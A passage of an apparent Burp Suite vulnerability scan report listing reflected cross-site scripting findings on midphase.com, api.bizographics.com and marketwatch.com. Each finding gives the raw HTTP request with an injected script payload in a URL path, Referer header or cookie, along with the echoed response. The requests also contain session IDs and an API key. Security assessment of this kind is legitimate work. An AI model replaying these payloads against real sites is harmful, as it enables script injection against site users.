Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captchaae79b"><script>alert(1)</script>9d0b499024c/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.107. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16be"><script>alert(1)</script>1b06e342ecb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha/cryptographp.inc.phpe16be"><script>alert(1)</script>1b06e342ecb?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha/cryptographp.inc.phpe16be"><script>alert(1)</script>1b06e342ecb?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.108. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abb0"><script>alert(1)</script>2e2a3247d6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes4abb0"><script>alert(1)</script>2e2a3247d6d/form-processing/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes4abb0"><script>alert(1)</script>2e2a3247d6d/form-processing/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.109. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5edea"><script>alert(1)</script>b0b3170b056 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing5edea"><script>alert(1)</script>b0b3170b056/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing5edea"><script>alert(1)</script>b0b3170b056/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.110. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 527ba"><script>alert(1)</script>327fd3bc82b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha527ba"><script>alert(1)</script>327fd3bc82b/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha527ba"><script>alert(1)</script>327fd3bc82b/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.111. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7"><script>alert(1)</script>06a292b4cf1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha/cryptographp.php9abb7"><script>alert(1)</script>06a292b4cf1?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha/cryptographp.php9abb7"><script>alert(1)</script>06a292b4cf1?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.112. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 40c1e<script>alert(1)</script>2e9333aef9f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 40c1e<script>alert(1)</script>2e9333aef9f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 14 May 2011 10:09:45 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 40c1e<script>alert(1)</script>2e9333aef9f

4.113. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c93e5'-alert(1)-'ec0cd355753 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&c93e5'-alert(1)-'ec0cd355753; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp04
Date: Sat, 14 May 2011 10:34:08 GMT
Content-Length: 141589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
   ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 1944859510,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA;biz=1053;c93e5'-alert(1)-'ec0cd355753;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   refreshDoma
...[SNIP]...

4.114. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b02"><script>alert(1)</script>4af42568a0c was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&56b02"><script>alert(1)</script>4af42568a0c; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp04
Date: Sat, 14 May 2011 10:33:59 GMT
Content-Length: 141753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA;biz=1053;56b02"><script>alert(1)</script>4af42568a0c;sz=230x25;tile=1;ord=1179691810?" type="text/javascript">
...[SNIP]...

4.115. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b46'%3balert(1)//2bc564917cd was submitted in the rsi_csl cookie. This input was echoed as 65b46';alert(1)//2bc564917cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA65b46'%3balert(1)//2bc564917cd; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp05
Date: Sat, 14 May 2011 10:37:07 GMT
Content-Length: 141515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
Client(
           ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 822959691,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA65b46';alert(1)//2bc564917cd;biz=1053;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   re
...[SNIP]...

4.116. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa672"><script>alert(1)</script>8a2f592393e was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lAfa672"><script>alert(1)</script>8a2f592393e; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfinwebp02
Date: Sat, 14 May 2011 10:37:03 GMT
Content-Length: 141693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elAfa672"><script>alert(1)</script>8a2f592393e;biz=1053;sz=230x25;tile=1;ord=1752227528?" type="text/javascript">
...[SNIP]...

4.117. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1c5"><script>alert(1)</script>51f807aa8f0 was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
